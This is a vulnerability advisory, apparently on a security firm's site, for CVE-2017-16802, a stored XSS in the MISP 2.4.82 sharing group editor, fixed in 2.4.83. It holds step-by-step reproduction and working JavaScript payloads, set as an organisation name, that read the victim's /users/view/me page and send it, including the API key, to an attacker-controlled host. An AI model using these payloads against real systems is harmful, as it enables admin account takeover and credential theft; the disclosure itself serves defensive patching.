Over 10 years we help companies reach their financial and branding goals. Engitech is a values-driven technology agency dedicated.

Gallery

Contacts

411 University St, Seattle, USA

engitech@oceanthemes.net

+1 -800-456-478-23

VULNERABILITY

XSS in the sharingGroupPopulateOrganisations function

DATE

13.11.2017 

Affected Vendor

CIRCL – Computer Incident Response Center Luxembourg

Affected Product

MISP – Malware Information Sharing Platform & Open Standards For Threat Information Sharing – https://www.misp-project.org/

Vulnerable version

2.4.82

Fixed version

2.4.83

Recommendations

Update to MISP version 2.4.83 

Vulnerability details

There is an XSS in ‘Edit Sharing Group’ area of MISP.

Easiest way to reproduce it:

  1. Create new organization with the following name: <script>alert('XSS');</script>
  2. Go to /Global Actions > List Sharing Groups/
  3. Edit existing sharing group or add new
  4. Go to Organisations tab
  5. Add Local Organisation
  6. Select <script>alert('XSS');</script> and move to right by >>
  7. Click Add

It could be done the same way from Add Remote Organisation.
One possible scenario is that some organisation which we trust synchronizes with ours and we want to add them to some sharing group.
This means that attack requires admin iteraction but the attacker can gain full admin access to victim MISP by stealing API key.

PoC

Stealing the API key from /users/view/me.
There is some fake name prepended to be displayed by a victim but not the actual payload.
Replace https://misp2.local with your controlled webserver and check logs after trying.

Follow the above steps to reproduce and put the following as an organisation name:
PUBLIC-NORTH-ATLANTIC-ORGANIZATION<script>$.get('/users/view/me',function(d){s=d.indexOf('<h2>User</h2>');e=d.indexOf('<div class="actions debugOff sideMenu',s);if(s>e)e=s*99;i=d.substring(s,e);$.get('https://misp2.local/'+escape(i));});</script>

Clear version:

PUBLIC-NORTH-ATLANTIC-ORGANIZATION<script>$.get('/users/view/me',function(d){
 pos_start = d.indexOf('<h2>User</h2>');
 pos_end = d.indexOf('<div class="actions debugOff sideMenu">',
pos_start);
 if(pos_start > pos_end) pos_end = pos_start*99;
 interested = d.substring(pos_start, pos_end);
 $.get('https://misp2.local/'+escape(interested));
});</script>

PoC

Short version:

PUBLIC-NORTH-ATLANTIC-ORGANIZATION<script>$.get('/users/view/me',function(d){$.get('https://misp2.local/'+escape(d));});</script>

CVE

CVE-2017-16802

Credits

Dawid Czarnecki

Do you think the security of your data might be lacking? Let's find the best approach together.
Once you contact us, we will ask you about the project you want to secure.

NEED A CONSULTATION?